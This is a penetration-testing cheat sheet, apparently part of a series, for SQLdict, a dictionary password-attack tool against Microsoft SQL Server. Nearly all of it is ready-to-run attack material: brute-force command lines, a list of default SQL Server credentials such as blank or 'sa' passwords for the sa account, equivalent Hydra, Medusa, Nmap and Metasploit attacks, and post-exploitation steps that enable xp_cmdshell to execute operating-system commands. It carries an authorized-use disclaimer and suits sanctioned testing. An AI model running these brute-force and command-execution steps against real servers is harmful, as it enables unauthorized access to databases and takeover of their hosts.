← All cheat sheets

SQLDICT

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

SQLdict is a dictionary-based password attack tool for Microsoft
SQL Server. It performs brute force login attempts against SQL
Server instances using a username and password wordlist.

BASIC USAGE#

sqldict <target> -u <user> -p <wordlist>
                                 # Brute force SQL Server login

OPTIONS#

sqldict <target>                 # Target SQL Server IP
sqldict -u <user>                # Username to attack (default: sa)
sqldict -p <wordlist>            # Password wordlist file
sqldict -P <port>                # SQL Server port (default: 1433)
sqldict -d <database>            # Target database name
sqldict -t <timeout>             # Connection timeout

EXAMPLES#

# Attack SA account with wordlist
sqldict 192.168.1.1 -u sa -p passwords.txt

# Custom port
sqldict 192.168.1.1 -u sa -p passwords.txt -P 1434

# Attack specific user account
sqldict 192.168.1.1 -u dbadmin -p passwords.txt

# With specific database
sqldict 192.168.1.1 -u sa -p passwords.txt -d master

COMMON SQL SERVER CREDENTIALS#

# Username      Password
# sa            (blank)
# sa            sa
# sa            password
# sa            sql
# sa            admin
# sa            1234
# probe         probe
# admin         admin
# distributor_admin  distributor_admin

PASSWORD WORDLISTS#

/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/metasploit/default_pass_for_services.txt
/usr/share/seclists/Passwords/Common-Credentials/
/usr/share/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt

ALTERNATIVE TOOLS#

# Hydra:
hydra -l sa -P passwords.txt <target> mssql

# Medusa:
medusa -h <target> -u sa -P passwords.txt -M mssql

# Nmap:
nmap --script ms-sql-brute -p 1433 <target>

# Metasploit:
use auxiliary/scanner/mssql/mssql_login
set RHOSTS <target>
set USERNAME sa
set PASS_FILE passwords.txt
run

POST-EXPLOITATION#

# After finding credentials:

# Connect with sqsh:
sqsh -S <target> -U sa -P <password>

# Enable xp_cmdshell:
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE

# Execute OS commands:
EXEC xp_cmdshell 'whoami'

NOTES#

- Windows-based tool (can run via Wine)
- Account lockout policies may trigger
- SA account is high-value target
- Modern SQL Server enforces password policies
- Consider timing between attempts
- Use specific wordlists for SQL Server
- Only for authorized penetration testing
- Pair with nmap ms-sql-info for version detection